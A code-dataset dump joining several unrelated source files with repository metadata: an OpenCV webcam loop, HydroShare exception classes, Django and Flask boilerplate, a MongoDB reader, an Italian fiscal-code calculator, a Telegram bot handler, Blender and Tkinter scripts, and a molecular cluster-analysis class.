# success, img = cap.read()
# cv2.imshow("Video",img)
# if cv2.waitKey(1) & 0xFF == ord('q'):
# break
import cv2

# Open the default camera and display frames until Esc is pressed.
cap = cv2.VideoCapture(0)  # video capture object
while True:  # keep pulling frames from the camera
    ret, img_color = cap.read()  # grab one frame
    if not ret:
        # Frame not ready yet; try again.
        continue
    cv2.imshow("color", img_color)  # show the frame
    # Bug fix: `cv2.waitKey(1)&0xFF == 27` parsed as
    # `waitKey(1) & (0xFF == 27)` because == binds tighter than &,
    # so Esc never exited the loop. Parenthesize the mask first.
    if (cv2.waitKey(1) & 0xFF) == 27:  # Esc pressed?
        break  # exit the loop
cap.release()
cv2.destroyAllWindows()
"cocomon173@gmail.com"
] | cocomon173@gmail.com |
7992c9ad590227ee1005fd6bf76442c50c6a898a | be13894bbd0c29a7e5ac191e098075acb83441e0 | /hs_restclient/exceptions.py | 5ba0ac2e32b4e41cf72bfe9104e96b128b80bced | [] | no_license | amabdallah/hs_restclient | 785bd237048df383818c41686de15b21ed5c3881 | ad2cc1d36c5331d79c9f93e3f06b484afaee9d06 | refs/heads/master | 2020-03-30T18:04:24.773757 | 2018-09-24T20:42:53 | 2018-09-24T20:42:53 | 151,482,242 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,880 | py | from .compat import http_responses
class HydroShareException(Exception):
    """Base class for all errors raised by the HydroShare client."""
    def __init__(self, args):
        super(HydroShareException, self).__init__(args)
class HydroShareArgumentException(HydroShareException):
    """Raised when an invalid argument is passed to a client call."""
    def __init__(self, args):
        super(HydroShareArgumentException, self).__init__(args)
class HydroShareBagNotReadyException(HydroShareException):
    """Raised when a requested resource bag is not yet ready for download."""
    def __init__(self, args):
        super(HydroShareBagNotReadyException, self).__init__(args)
class HydroShareNotAuthorized(HydroShareException):
    """Raised when the server refuses an operation for the current user.

    ``args`` is a tuple ``(method, url)``.
    """
    def __init__(self, args):
        super(HydroShareNotAuthorized, self).__init__(args)
        self.method = args[0]
        self.url = args[1]
    def __str__(self):
        msg = "Not authorized to perform {method} on {url}."
        return msg.format(method=self.method, url=self.url)
    def __unicode__(self):
        # NOTE(review): `unicode` exists only on Python 2; on Python 3 this
        # raises NameError -- confirm the supported interpreter versions.
        return unicode(str(self))
class HydroShareNotFound(HydroShareException):
    """Raised when a resource, or a file within a resource, does not exist.

    ``args`` is a tuple ``(pid,)`` or ``(pid, filename)``.
    """
    def __init__(self, args):
        super(HydroShareNotFound, self).__init__(args)
        self.pid = args[0]
        if len(args) >= 2:
            self.filename = args[1]
        else:
            self.filename = None
    def __str__(self):
        if self.filename:
            # Bug fix: the template previously hard-coded "(unknown)" while
            # still passing filename= to format(); restore the placeholder
            # so the actual file name is reported.
            msg = "File '{filename}' was not found in resource '{pid}'."
            msg = msg.format(filename=self.filename, pid=self.pid)
        else:
            msg = "Resource '{pid}' was not found."
            msg = msg.format(pid=self.pid)
        return msg
    def __unicode__(self):
        # NOTE(review): Python 2 only; raises NameError on Python 3.
        return unicode(str(self))
class HydroShareHTTPException(HydroShareException):
    """ Exception used to communicate HTTP errors from HydroShare server

        Arguments in tuple passed to constructor must be: (url, status_code, params).
        url and status_code are of type string, while the optional params argument
        should be a dict.
    """
    def __init__(self, args):
        super(HydroShareHTTPException, self).__init__(args)
        self.url = args[0]
        self.method = args[1]
        self.status_code = args[2]
        # params is optional; default to None when only three items are given.
        if len(args) >= 4:
            self.params = args[3]
        else:
            self.params = None
    def __str__(self):
        msg = "Received status {status_code} {status_msg} when accessing {url} " + \
              "with method {method} and params {params}."
        # http_responses maps a status code to its reason phrase (see .compat).
        return msg.format(status_code=self.status_code,
                          status_msg=http_responses[self.status_code],
                          url=self.url,
                          method=self.method,
                          params=self.params)
    def __unicode__(self):
        # NOTE(review): Python 2 only; raises NameError on Python 3.
        return unicode(str(self))
class HydroShareAuthenticationException(HydroShareException):
    """Raised when the authentication configuration given to the client is invalid."""
    def __init__(self, args):
        # Bug fix: this previously called
        # super(HydroShareArgumentException, self).__init__(args), which
        # raises TypeError because instances of this class are not
        # HydroShareArgumentException instances.
        super(HydroShareAuthenticationException, self).__init__(args)
| [
"henderson.mark@gmail.com"
] | henderson.mark@gmail.com |
2b5e564d6ab41882c760581c6c2064fb3dff0a89 | dfd42e01e5eec2a49d4ca6e8d83c528a0502d5c0 | /manage.py | e4b8c67c35d4523f463b5d610eef01577b04a3f1 | [] | no_license | andber6/myFirstDjangoProject | ba04d4794159b2717d1c1359e2e30ebe4fb05f8c | 60fb1a5f1706fd8a8fb11191886da92323e40654 | refs/heads/master | 2023-08-10T19:26:12.598266 | 2020-10-23T06:52:41 | 2020-10-23T06:52:41 | 304,015,358 | 0 | 0 | null | 2021-09-22T19:38:50 | 2020-10-14T12:57:10 | HTML | UTF-8 | Python | false | false | 667 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
    """Run administrative tasks."""
    # Point Django at this project's settings module unless already set.
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'msp4_django.settings')
    try:
        from django.core.management import execute_from_command_line
    except ImportError as exc:
        raise ImportError(
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        ) from exc
    # Dispatch the management command given on the command line.
    execute_from_command_line(sys.argv)


if __name__ == '__main__':
    main()
"andre.bergan99@hotmail.com"
] | andre.bergan99@hotmail.com |
e43879a27c810b6df0e94eaeb7fada5fea81300f | c96e4f48bdbcee827a7b3a47324d1ab09389834e | /app/models.py | 8d399b54798772c25052d62acce77d052f4721f2 | [] | no_license | renzhixin/flasky | c39f60cb7832e73f718d2853eba359d8ac854ad4 | 6e920d2f9174e9b4cb9666f649a90b18bf6bce6b | refs/heads/main | 2023-03-27T15:03:52.108453 | 2021-03-17T14:35:33 | 2021-03-17T14:35:33 | 347,313,229 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,659 | py | from werkzeug.security import generate_password_hash, check_password_hash
from app import db
from flask_login import UserMixin
from . import login_manager # login_manager是在app.init文件中定义
from itsdangerous import TimedJSONWebSignatureSerializer as Serializer
from flask import current_app
@login_manager.user_loader
def load_user(user_id):
    """
    The login_manager.user_loader decorator registers this function with
    Flask-Login, which calls it whenever it needs the record of the
    currently logged-in user.  Without this registration Flask-Login
    cannot resolve the current user.
    """
    return User.query.get(int(user_id))
class Role(db.Model):
    """User role; one role may be shared by many users."""
    __tablename__ = 'roles'
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(64), unique=True)
    # Reverse side exposed on User as `user.role`.
    users = db.relationship('User', backref='role')
    def __repr__(self):
        return '<Role %r>' % self.name
class User(UserMixin, db.Model):
    """Application user with password hashing and e-mail confirmation."""
    __tablename__ = 'users'
    id = db.Column(db.Integer, primary_key=True)
    email = db.Column(db.String(64), unique=True, index=True)
    username = db.Column(db.String(64), unique=True, index=True)
    role_id = db.Column(db.Integer, db.ForeignKey('roles.id'))
    password_hash = db.Column(db.String(128))
    confirmed = db.Column(db.Boolean, default=False)

    @property
    def password(self):
        # The plain-text password is write-only.
        raise AttributeError('password is not a Readable attribute')

    @password.setter
    def password(self, password):
        self.password_hash = generate_password_hash(password)

    def verify_password(self, password):
        """Return True if *password* matches the stored hash."""
        return check_password_hash(self.password_hash, password)

    def generate_confirmation_token(self, expiration=3600):
        """
        Generate an e-mail confirmation token.

        :param expiration: token lifetime in seconds (default 3600).
        :return: dumps() signs the payload and serializes data plus
            signature into the token string.
        """
        s = Serializer(current_app.config['SECRET_KEY'], expiration)
        return s.dumps({'confirm': self.id}).decode('utf-8')

    def confrim(self, token):
        """
        Validate a confirmation token for this user.

        (Method name is misspelled but kept for backward compatibility
        with existing callers.)

        :param token: token string received via the confirmation request.
        :return: True if the token is valid for this user, else False.
        """
        s = Serializer(current_app.config['SECRET_KEY'])
        try:
            data = s.loads(token.encode('utf-8'))
        except Exception:
            # Narrowed from a bare `except:` so system exits/interrupts
            # are not swallowed.
            return False
        if data.get('confirm') != self.id:
            return False
        # Bug fix: previously assigned to the misspelled attribute
        # `confrimed`, so the real `confirmed` column was never updated.
        self.confirmed = True
        db.session.add(self)
        return True

    def __repr__(self):
        # Bug fix: previously labelled '<Role %r>' (copy-paste from Role).
        return '<User %r>' % self.username
"xtrenzhixin@163.com"
] | xtrenzhixin@163.com |
8ea9c38aeddfab4bb77ef6565f76af102d5a3c3c | 926feaf07b7b961ab9efce962cb5764d7894e56a | /service/mongodb.py | 7cdbeca08670f1f35c8672ee8537baae62043f51 | [
"Apache-2.0"
] | permissive | ga-hegsvold/mongodb-source | ac804218c87b5ba4b7c6276037cc510899ed1e3b | 1c81f4f751323817944a98f1425ca3735667cf4d | refs/heads/master | 2023-05-29T18:57:22.751083 | 2019-08-12T13:19:56 | 2019-08-12T13:19:56 | 133,238,613 | 0 | 1 | Apache-2.0 | 2023-05-01T21:26:40 | 2018-05-13T13:17:27 | Python | UTF-8 | Python | false | false | 2,005 | py | import pymongo
import datetime
import json
from bson import ObjectId
from datetime import datetime
import os
import logging
# 2017-03-16T10:15:15.677000Z
DATETIME_FORMAT = '%Y-%m-%dT%H:%M:%S.%fZ'
# set logging
log_level = logging.getLevelName(os.environ.get('LOG_LEVEL', 'INFO')) # default log level = INFO
logging.basicConfig(level=log_level) # dump log to stdout
# encode MongoDB BSON as JSON
# encode MongoDB BSON as JSON
class JSONEncoder(json.JSONEncoder):
    """json.JSONEncoder that also handles BSON ObjectId and datetime values."""
    def default(self, o):
        if isinstance(o, ObjectId):
            # ObjectIds become their hex-string form.
            return str(o)
        if isinstance(o, datetime):
            # Datetimes are formatted with the module-level DATETIME_FORMAT.
            return str(o.strftime(DATETIME_FORMAT))
        return json.JSONEncoder.default(self, o)
class MongoDB(object):
    """Read-only helper that returns MongoDB documents as JSON-safe dicts."""

    def __init__(self, uri, database):
        self._client = pymongo.MongoClient(uri)
        self._db = self._client[database]

    def __get_all_entities(self, collection):
        # Bug fix: results used to accumulate in a shared self._result list,
        # so a second get_entities() call returned duplicated documents.
        # Build and return a fresh list on every call instead.
        result = []
        for entity in self._db[collection].find():
            json_string = JSONEncoder().encode(entity)
            # decode JSON entity before appending to result list
            result.append(json.loads(json_string))
        return result

    def __get_all_entities_since(self, collection, since):
        dt = datetime.strptime(since, DATETIME_FORMAT)
        logging.debug('parsed date: %s' % repr(dt))
        result = []
        # FIXME: property to match 'since' varies from source to source
        for entity in self._db[collection].find({'lastModified': {'$gt': dt}}):
            json_string = JSONEncoder().encode(entity)
            # decode JSON entity before appending to result list
            result.append(json.loads(json_string))
        return result

    def get_entities(self, collection, since=None):
        """Return all documents of *collection*; when *since* (a
        DATETIME_FORMAT timestamp) is given, only those modified after it."""
        if since is None:
            logging.debug('getting all entities')
            return self.__get_all_entities(collection)
        else:
            logging.debug('getting entities since %s' % since)
            return self.__get_all_entities_since(collection, since)
| [
"geir.hegsvold@sesam.io"
] | geir.hegsvold@sesam.io |
88db90c935b2eb4f151a341b7420f38c5bbfeb67 | ffd68c0eb5eb3ef9c81ef68c940c29b3e4fa9cd7 | /codice_fiscale/codicefiscale.py | 09e7701e0d8e8fbdd877dfd356e73c311acdef43 | [] | no_license | ricpol/python_exercises | 794706e5c3ed4372e64ef4d7373608e01886c8a4 | eb5d7d9a121ff2372f4d1ee0d9e15f3f23471208 | refs/heads/master | 2016-09-06T03:11:15.519312 | 2012-04-02T11:20:32 | 2012-04-02T11:20:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,241 | py | # -*- coding: utf-8 -*-
"""
Calcolo del codice fiscale italiano a partire dai dati anagrafici.
Vedi http://it.wikipedia.org/wiki/Codice_fiscale per ulteriori informazioni.
Vedi http://it.wikipedia.org/wiki/Omocodia per limitazioni all'uso di questo
codice.
Questo modulo contiene il motore di calcolo.
"""
from datetime import date
class InvalidDataError(Exception):
    """Raised when the personal data contains characters that cannot be encoded."""
# Conversion table for accented vowels and other unusual marks.
# TODO add more? But we must be sure they really transliterate this way.
segni_normalizzati = dict(zip(
    (ord(i) for i in u"ÀÁÂÃÄÅÈÉÊËÌÍÎÏÒÓÔÕÖÙÚÛÜÇ´"),
    (ord(i) for i in u"AAAAAAEEEEIIIIOOOOOUUUUC'")))
# Deletion tables for vowels and for consonants, including space and
# apostrophe to support double and "noble" names.
vocali = {ord(i):None for i in u" 'AEIOU"}
consonanti = {ord(i):None for i in u" 'BCDFGHJKLMNPQRSTVWXYZ"}
def codice_cognome(cognome):
    """The first three letters of the code, derived from the surname.

    Consonants first, then vowels, right-padded with 'X' to length 3.
    @type cognome: unicode"""
    cognome = cognome.upper().translate(segni_normalizzati)
    cons = cognome.translate(vocali)       # consonants only
    vocs = cognome.translate(consonanti)   # vowels only
    return (cons + vocs)[:3].ljust(3, u'X')
def codice_nome(nome):
    """The second three letters of the code, derived from the first name.

    With four or more consonants, the 1st, 3rd and 4th are used; otherwise
    fall back to consonants-then-vowels padded with 'X', as for surnames.
    @type nome: unicode"""
    nome = nome.upper().translate(segni_normalizzati)
    cons = nome.translate(vocali)       # consonants only
    vocs = nome.translate(consonanti)   # vowels only
    try:
        return ''.join((cons[0], cons[2], cons[3]))
    except IndexError:
        # Fewer than four consonants available.
        return (cons + vocs)[:3].ljust(3, u'X')
mesi = '_ABCDEHLMPRST'  # one letter per month (index 0 is a filler)
def codice_nascita(data, sesso):
    """Letters seven to eleven of the code, for the date of birth.

    @param data: date of birth
    @type data: datetime.date
    @param sesso: sex ('M' or 'm' means male; anything else is treated
        as female)
    """
    # For females, 40 is added to the day of the month.
    mod = 0 if sesso in 'Mm' else 40
    g = str(data.day+mod).zfill(2)
    m = mesi[data.month]
    a = str(data.year)[-2:]
    return a + m + g
def codice_geografia(stato, provincia, comune, db):
    """Letters twelve to fifteen of the code, for the place of birth.

    @param db: a callable returning the cadastral code (fetched from a
        database or other storage). Its signature must be
        db(stato, provincia, comune).
    """
    return db(stato, provincia, comune)
alfabeto = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
# Check-digit values: for each character, the first tuple item is the
# value used in even positions, the second in odd positions.
controllo = {'0':(0, 1), '1':(1, 0), '2':(2, 5), '3':(3, 7),
             '4':(4, 9), '5':(5, 13), '6':(6, 15), '7':(7, 17),
             '8':(8, 19), '9':(9, 21),
             'A':(0, 1), 'B':(1, 0), 'C':(2, 5), 'D':(3, 7),
             'E':(4, 9), 'F':(5, 13), 'G':(6, 15), 'H':(7, 17),
             'I':(8, 19), 'J':(9, 21), 'K':(10, 2), 'L':(11, 4),
             'M':(12, 18), 'N':(13, 20), 'O':(14, 11), 'P':(15, 3),
             'Q':(16, 6), 'R':(17, 8), 'S':(18, 12), 'T':(19, 14),
             'U':(20, 16), 'V':(21, 10), 'W':(22, 22), 'X':(23, 25),
             'Y':(24, 24), 'Z':(25, 23)}
def codice_controllo(codice):
    """The sixteenth and final letter of the code: the check character.

    Raises InvalidDataError if the input contains characters that are not
    in the `controllo` table.
    """
    try:
        resto = sum([controllo[i][(n+1)%2] for n, i in enumerate(codice)])%26
    except KeyError:
        # Modernized from the Python-2-only `raise Exc, msg` statement to
        # the call form, which behaves identically on Python 2 and is also
        # valid on Python 3.
        raise InvalidDataError('caratteri non validi in input')
    return alfabeto[resto]
def codice_fiscale(cognome, nome, nascita, sesso, stato, provincia, comune, db):
    """Return the Italian fiscal code computed from the personal data.

    Raises InvalidDataError if name or surname contain invalid characters.
    @type cognome: unicode
    @type nome: unicode
    @type nascita: datetime.date
    @param db: a callable returning the cadastral code of the birth place
        (from a database or other storage). Its signature must be
        db(stato, provincia, comune).
    """
    codice = (codice_cognome(cognome) +
              codice_nome(nome) +
              codice_nascita(nascita, sesso) +
              codice_geografia(stato, provincia, comune, db))
    # Append the check character computed over the first fifteen.
    return codice + codice_controllo(codice)
if __name__ == '__main__':
    # A small text interface to play with the module (Python 2; all the
    # user-facing strings are Italian and must stay as they are).
    import sys
    import db
    try:
        con = db.Connessione()
    # NOTE(review): bare `except:` also swallows KeyboardInterrupt/SystemExit.
    except:
        raw_input('Problema con il database... Invio per terminare.')
        sys.exit(1)
    enc = sys.stdin.encoding
    sep = '\n' + '='*30 + '\n\n'
    print 'CALCOLO DEL CODICE FISCALE\n\n'
    while True:
        # Keep asking until the user answers anything other than 's' (yes).
        if raw_input('Vuoi calcolare un CF? (s/n)') != 's': break
        nome = raw_input('Nome? ').strip().decode(enc)
        cognome = raw_input('Cognome? ').strip().decode(enc)
        sesso = raw_input('Sesso? (m/f) ').strip()
        giorno = raw_input('Giorno di nascita? ').strip()
        mese = raw_input('Mese di nascita? ').strip()
        anno = raw_input('Anno di nascita? ').strip()
        stato = raw_input('Stato di nascita? ').strip().upper().decode(enc)
        provincia = raw_input('Prov. di nascita? ').strip().upper().decode(enc)
        comune = raw_input('Comune di nascita? ').strip().upper().decode(enc)
        try:
            nascita = date(int(anno), int(mese), int(giorno))
        except ValueError:
            print 'Data di nascita non valida.', sep
            continue
        try:
            cod = codice_fiscale(cognome, nome, nascita,
                                 sesso, stato, provincia, comune,
                                 con.codici_geografici)
            print 'CF: ', cod, sep
        except InvalidDataError:
            print 'Nome o cognome contengono caratteri non validi.', sep
        except db.DBQueryError:
            print 'Ci sono problemi con la query del database.', sep
        except db.DBNoDataError:
            print 'Non esiste un codice per il comune/stato immesso.', sep
"ric.pol@libero.it"
] | ric.pol@libero.it |
5088d1c8efb01a00cf118d5caacaf7548139aafd | 258fccefe5cb77d07f6019179499a2a8b3b783c8 | /start.py | 5989b3f1e2e654cc8bd1c898441bdd9410d40dfe | [] | no_license | mouryachandra53/youtubemourya | ead7b397d1447a25edbd9bf5b0d58b276907080e | e49dc9a754b3950d428e2ccb3e3046e233bb1d31 | refs/heads/main | 2023-03-03T12:33:06.305226 | 2021-02-16T11:48:02 | 2021-02-16T11:48:02 | 339,379,827 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 591 | py | from pyrogram import Client, Filters, StopPropagation, InlineKeyboardButton, InlineKeyboardMarkup
# NOTE(review): this uses the legacy pyrogram v0.x API (capitalized
# `Filters` and keyboard classes imported from `pyrogram` directly);
# pyrogram v1+ moved these -- confirm the pinned pyrogram version.
@Client.on_message(Filters.command(["start"]), group=-2)
async def start(client, message):
    """Reply to /start with a greeting and two inline URL buttons."""
    # return
    joinButton = InlineKeyboardMarkup([
        [InlineKeyboardButton("Movies", url="https://t.me/Mouryac_bot")],
        [InlineKeyboardButton(
            "Report Bugs 😊", url="https://t.me/IAmMourya8")]
    ])
    welcomed = f"Hey <b>{message.from_user.first_name}</b>\n/help for More info"
    await message.reply_text(welcomed, reply_markup=joinButton)
    # Prevent other handlers from also processing this /start message.
    raise StopPropagation
| [
"noreply@github.com"
] | mouryachandra53.noreply@github.com |
238fc407890727201e1ced9c07aac1eef3dae941 | 5d6245b59dd89da69accc58c82b4b9bde2ef7147 | /GUI/timer.py | 1e6e784d766c60599edf8d09686989f492408c3b | [] | no_license | ksakkas/Learn-Python | c105e68eec8594f934c6fafd15b39b99c4abf886 | 99983ef61f7225596f3122a8d1b43d01ec4d0b64 | refs/heads/master | 2023-01-11T22:31:17.810297 | 2020-10-18T07:32:52 | 2020-10-18T07:32:52 | 295,176,499 | 1 | 0 | null | 2020-09-13T19:09:05 | 2020-09-13T15:09:43 | Python | UTF-8 | Python | false | false | 280 | py | from tkinter import *
# Minimal Tkinter window: a "minutes" label, a 1-20 slider, and a button.
# (The UI strings are Greek and are left untouched.)
root = Tk()
minutes = Label(root, text="Λεπτά:")  # label reads "Minutes:"
minutes.pack(side=LEFT)
scale = Scale(root, from_=1, to=20, orient=HORIZONTAL, length=500)
scale.pack()
# NOTE(review): the button is labelled "Start now" but is wired to `quit`,
# so pressing it closes the application -- confirm this is intended.
button = Button(root, text="Ξεκίνα τώρα", command=quit)
button.pack()
root.mainloop()
"ksakkasuoi@gmail.com"
] | ksakkasuoi@gmail.com |
9e61572f67d50a39de89d854f9fd2e9bd849f154 | c475cd8531a94ffae69cc92371d41531dbbddb6c | /Data/BlenderScript/2.71/test.py | 2d32dfe6ae7a6f0117bddb54cc8ce04b69e69456 | [
"Apache-2.0",
"LicenseRef-scancode-free-unknown"
] | permissive | WolfireGames/overgrowth | 72d3dd29cbd7254337265c29f8de3e5c32400114 | 594a2a4f9da0855304ee8cd5335d042f8e954ce1 | refs/heads/main | 2023-08-15T19:36:56.156578 | 2023-05-17T08:17:53 | 2023-05-17T08:20:36 | 467,448,492 | 2,264 | 245 | Apache-2.0 | 2023-05-09T07:29:58 | 2022-03-08T09:38:54 | C++ | UTF-8 | Python | false | false | 3,371 | py | import bpy
from xml.etree import cElementTree as ET
print("\nRunning character loader:")
working_dir = "C:/Users/David/Desktop/WolfireSVN/"
actor_xml_path = working_dir + 'Data/Objects/IGF_Characters/IGF_GuardActor.xml'
print("Loading actor file: "+actor_xml_path)
xml_root = ET.parse(actor_xml_path).getroot()
character_xml_path = None
for element in xml_root:
if element.tag == "Character":
character_xml_path = element.text
object_xml_path = None
skeleton_xml_path = None
if character_xml_path:
print("Loading character file: "+working_dir+character_xml_path)
xml_root = ET.parse(working_dir+character_xml_path).getroot()
for element in xml_root:
if(element.tag == "appearance"):
object_xml_path = element.get("obj_path")
skeleton_xml_path = element.get("skeleton")
model_path = None
color_path = None
normal_path = None
palette_map_path = None
shader_name = None
if object_xml_path:
print("Loading object file: "+working_dir+object_xml_path)
xml_root = ET.parse(working_dir+object_xml_path).getroot()
for element in xml_root:
if(element.tag == "Model"):
model_path = element.text
if(element.tag == "ColorMap"):
color_path = element.text
if(element.tag == "NormalMap"):
normal_path = element.text
if(element.tag == "PaletteMap"):
palette_map_path = element.text
if(element.tag == "ShaderName"):
shader_name = element.text
bone_path = None
if skeleton_xml_path:
print("Loading skeleton file: "+working_dir+skeleton_xml_path)
xml_root = ET.parse(working_dir+skeleton_xml_path).getroot()
print(xml_root)
model_path = xml_root.get("model_path")
bone_path = xml_root.get("bone_path")
'''if model_path:
print("Model path: "+working_dir+model_path)
bpy.ops.import_scene.obj(filepath=(working_dir+model_path))
'''
_min_skeleton_version = 6
import struct
if bone_path:
print("Bone path: "+working_dir+bone_path)
with open(working_dir+bone_path, mode='rb') as file:
contents = file.read()
file.close()
cursor = 0;
temp_read = struct.unpack("i", contents[cursor:cursor+4])
cursor += 4
version = 5
if temp_read[0] >= _min_skeleton_version:
version = temp_read[0];
temp_read = struct.unpack("i", contents[cursor:cursor+4])
cursor += 4
print("Version: "+str(version))
print("Rigging stage: "+str(temp_read[0]))
num_points = struct.unpack("i", contents[cursor:cursor+4])[0]
cursor += 4
print("Num points: "+str(num_points))
points = []
for i in range(0, num_points):
points += struct.unpack("fff", contents[cursor:cursor+12])
cursor += 12
point_parents = []
if version >= 8:
for i in range(0, num_points):
point_parents += struct.unpack("i", contents[cursor:cursor+4])
cursor += 4
num_bones = struct.unpack("i", contents[cursor:cursor+4])[0]
cursor += 4
print("Num bones: "+str(num_bones))
bone_ends = []
bone_mats = []
for i in range(0, num_bones):
bone_ends += struct.unpack("ii", contents[cursor:cursor+8])
cursor += 8
print(bone_ends) | [
"max@autious.net"
] | max@autious.net |
7690187092e10418ab3660f7a4c9a7d27f10692d | 807dc5d1c596cc0961fb18396890fd8dc1049372 | /nanoHUB-binary-mixture-cyclic-peptides/.svn/text-base/Process_COM.py.svn-base | c7f5405154fac581360e058f4678ea325a590e71 | [] | no_license | matthewjsullivan1/code-samples-matthew-sullivan | b9916030911e4f9b4663316c78b672bde2de9360 | f9dcab057182a87f192fc5c14d4add9baccc6cc1 | refs/heads/master | 2021-01-20T08:54:37.314931 | 2017-11-11T03:41:03 | 2017-11-11T03:41:03 | 90,200,808 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,210 | from numpy import *
import math
from Options import Options
class Process_COM:
    """Cluster analysis of molecular centers of mass (COM).

    Reads COM coordinates from a trajectory-style text stream, builds an
    adjacency matrix of molecules within a distance cutoff (with periodic
    boundary conditions), and reports cluster-size and interface histograms.
    """

    def __init__(self, input):
        # NOTE(review): parameter name shadows the builtin input();
        # it is an open file-like object of COM coordinates.
        options = Options()
        self.input_ = input
        self.nummol_ = options.numunits_
        self.xcoord_ = []
        self.ycoord_ = []
        self.zcoord_ = []
        # nummol x nummol connectivity matrix (numpy, via `from numpy import *`).
        self.adjmatrix_ = zeros((self.nummol_,self.nummol_))
        # Distance threshold for two molecules to count as "bonded".
        # Units presumably match the coordinate file — confirm.
        self.cutoff_ = 7.53
        self.lengthlist_ = []
        self.options_ = options

    def _Readcoords(self):
        """Read the next frame's COM coordinates into the x/y/z lists.

        Skips lines until one containing the molecule count appears
        (a fragile frame-header heuristic), then reads nummol rows of
        "<label> x y z".
        """
        self.xcoord_ = []
        self.ycoord_ = []
        self.zcoord_ = []
        line = self.input_.readline().split()
        cond = str(self.nummol_) not in line
        while cond:
            line = self.input_.readline().split()
            cond = str(self.nummol_) not in line
        for ii in range(self.nummol_):
            line = self.input_.readline().split()
            self.xcoord_.append(float(line[1]))
            self.ycoord_.append(float(line[2]))
            self.zcoord_.append(float(line[3]))

    def AreBonded(self, ind1, ind2):
        """Return True if molecules ind1 and ind2 are within the cutoff.

        Uses the minimum-image convention: any per-axis separation larger
        than half the box width is wrapped through the periodic boundary.
        A molecule is never bonded to itself.
        """
        if ind1 == ind2:
            return False
        else:
            coor1_ = [self.xcoord_[ind1], self.ycoord_[ind1], self.zcoord_[ind1]]
            coor2_ = [self.xcoord_[ind2], self.ycoord_[ind2], self.zcoord_[ind2]]
            # Box widths per axis from [xlo, xhi, ylo, yhi, zlo, zhi].
            width = [self.options_.box_[1] - self.options_.box_[0],
                     self.options_.box_[3] - self.options_.box_[2],
                     self.options_.box_[5] - self.options_.box_[4]]
            incr = [math.fabs(coor1_[0] - coor2_[0]),
                    math.fabs(coor1_[1] - coor2_[1]),
                    math.fabs(coor1_[2] - coor2_[2])]
            for ii in range(len(incr)):
                if incr[ii] > 0.5 * width[ii]:
                    incr[ii] = width[ii] - incr[ii]
            dist = math.sqrt(incr[0]**2 + incr[1]**2 +incr[2]**2)
            return dist <= self.cutoff_

    def _Filladjmatrix(self):
        """Recompute the full (symmetric) adjacency matrix for this frame."""
        for ii in range(self.nummol_):
            for jj in range(self.nummol_):
                self.adjmatrix_[ii, jj] = self.AreBonded(ii,jj)

    def Neighbors(self, ID):
        """Return the list of molecule indices bonded to ID."""
        # NOTE(review): local name shadows the builtin set().
        set = []
        for ii in range(self.nummol_):
            if ii != ID and self.adjmatrix_[ID][ii]:
                set.append(ii)
        return set

    def Complength(self, ID, countedlist, length):
        """Depth-first traversal: grow the cluster containing ID.

        countedlist accumulates every molecule already assigned to a cluster;
        length counts the molecules added during this call chain.
        Returns (countedlist, length). Recursive — very large clusters could
        in principle hit Python's recursion limit.
        """
        # EAFP membership test via list.index (works, but `ID in countedlist`
        # would be the idiomatic form).
        try:
            countedlist.index(ID)
            NotInvestigated = False
        except ValueError:
            NotInvestigated = True
        if NotInvestigated:
            Bondedmols = self.Neighbors(ID)
            countedlist.append(ID)
            length += 1
            for mols in Bondedmols:
                countedlist, length = self.Complength(mols, countedlist,
                                                      length)
            return countedlist, length
        else:
            return countedlist, length

    def _Createlengthlist(self):
        """Compute the size of each connected cluster in the current frame."""
        countedlist = []
        self.lengthlist_ = []
        for ii in range(self.nummol_):
            countedlist, length = self.Complength(ii, countedlist, 0)
            # length == 0 means ii was already counted in an earlier cluster.
            if length != 0:
                self.lengthlist_.append(length)

    def _Lengthhisto(self):
        """Return a text histogram of cluster sizes, binned in pairs."""
        Histo = [0, 0, 0, 0, 0]
        for ii in self.lengthlist_:
            if ii > 0 and ii <= 2: Histo[0] += 1
            elif ii > 2 and ii <= 4: Histo [1] += 1
            elif ii > 4 and ii <= 6: Histo [2] += 1
            elif ii > 6 and ii <= 8: Histo [3] += 1
            elif ii > 8: Histo[4] += 1
        output = []
        categ = ["1-2", "3-4", "5-6", "7-8", "8- "]
        for jj in range(len(Histo)):
            output.append("%s %d" % (categ[jj], Histo[jj]))
        return "\n".join(output)

    def Execute(self):
        """Process one frame: read coords, rebuild adjacency, histogram sizes."""
        self._Readcoords()
        self._Filladjmatrix()
        self._Createlengthlist()
        return self._Lengthhisto()

    def Interfaceshisto(self):
        """Count bonded pairs by unit-type combination.

        Assumes unit types 1 ("red") and 3 ("blue") — TODO confirm against
        Options.unittype_. Each unordered pair is counted once (ii > jj).
        """
        categ = ["RedtoRed", "RedtoBlue", "BluetoBlue"]
        Histo = [0, 0, 0]
        unittype = self.options_.unittype_
        for ii in range(self.adjmatrix_.shape[0]):
            for jj in range(self.adjmatrix_.shape[1]):
                if self.adjmatrix_[ii, jj] == 1 and ii > jj:
                    if unittype[ii] == 1 and unittype[jj] == 1:
                        Histo[0] += 1
                    elif unittype[ii] != unittype[jj]:
                        Histo[1] += 1
                    elif unittype[ii] == 3 and unittype[jj] == 3:
                        Histo[2] += 1
        output = []
        for jj in range(len(Histo)):
            output.append("%s %d" % (categ[jj], Histo[jj]))
        return "\n".join(output)

    def Averagelength(self):
        """Return the mean cluster size, or 1 when no clusters were found."""
        # NOTE(review): local name shadows the builtin sum().
        sum = 0.0
        count = 0.0
        for ii in self.lengthlist_:
            sum += ii
            count += 1
        if count == 0:
            return 1
        else:
            return (sum / count)
#input = open("com.txt", 'r')
#opt = Options()
#opt.box = [0, 50, 0, 50, 0, 50]
#obj = ProcessCOM(input, 10, opt)
#for ii in range(11):
# obj.Execute()
# print obj.xcoord_
# print obj.ycoord_
# print obj.zcoord_
# print obj.lengthlist_
# print obj.options_.box_
# print obj.AverageLength()
# print obj.adjmatrix_
#input.close()
| [
"matthew.j.sullivan1@gmail.com"
